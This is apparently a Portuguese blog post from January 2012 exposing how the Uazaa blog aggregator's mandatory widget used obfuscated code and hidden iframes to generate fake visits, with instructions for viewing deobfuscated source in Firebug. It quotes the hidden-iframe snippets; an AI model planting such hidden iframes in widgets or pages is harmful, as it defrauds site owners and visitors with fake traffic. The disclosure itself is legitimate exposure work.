  • 2. Com este caracteres estranhos não entendemos nada, não é mesmo ? Desta forma, quando visualizamos o código fonte da página, ninguém consegue entender o que este código faz. Bom amigo blogueiro, agora vou explicar para vocês, uma forma para verificar se algum site está utilizando de artimanhas para mandar visitas. Existe um plugin do Firefox que se chama Firebug (http://firebug.softonic.com.br/download) Ele é uma ferramenta que ajuda os programadores na hora de desenvolver sites. Uma das inúmeras funcionalidades dele é mostrar como seria o código fonte, independente se o cara criptografou... Vamos agora ao exemplo, usando o nosso Agregador Favorito. Vamos direto ao arquivo do trambique: o dos Widgets... http://www.uazaa.xpg.com.br/widgets/250x250.php Ativamos o Firebug e... Aparece o código fonte já descriptografado... Tcham tcham tcham tcham!!!!
  • 3. Achamos os IFRAMES.... ☺ Explicando o método: Uma das exigências de parceria do Uazaa é a utilização do widget em todos os blogs parceiros. Desta forma, quando alguém acessa o seu blog, TODO acesso gera um acesso à página inicial do uazaa e também um acesso falso para algum blogueiro (geralmente os que ficam no topo durante o dia). O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/fuckoff.php"> gera um link aleatório para que o uazaa mande visitas para algum blogueiro. (Experimente acessar http://www.uazaa.xpg.com.br/fuckoff.php que toda vez é um site diferente) PS: Logo após a denúncia, ele alterou o nome do script para: http://www.uazaa.com.br/newRed.php (atualização feita em 14/01/2012)
  • 4. O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/"> Gera um acesso para a home do uazaa... Por exemplo: Se vc tiver 50 online no seu blog, o widget será carregado 50 vezes... e automaticamente será contado + 50 acessos na home do uazaa... E de quebra o uazaa manda visitas falsas para 50 blogs. Tá dado o recado... 13/01/2012 @devninjaBR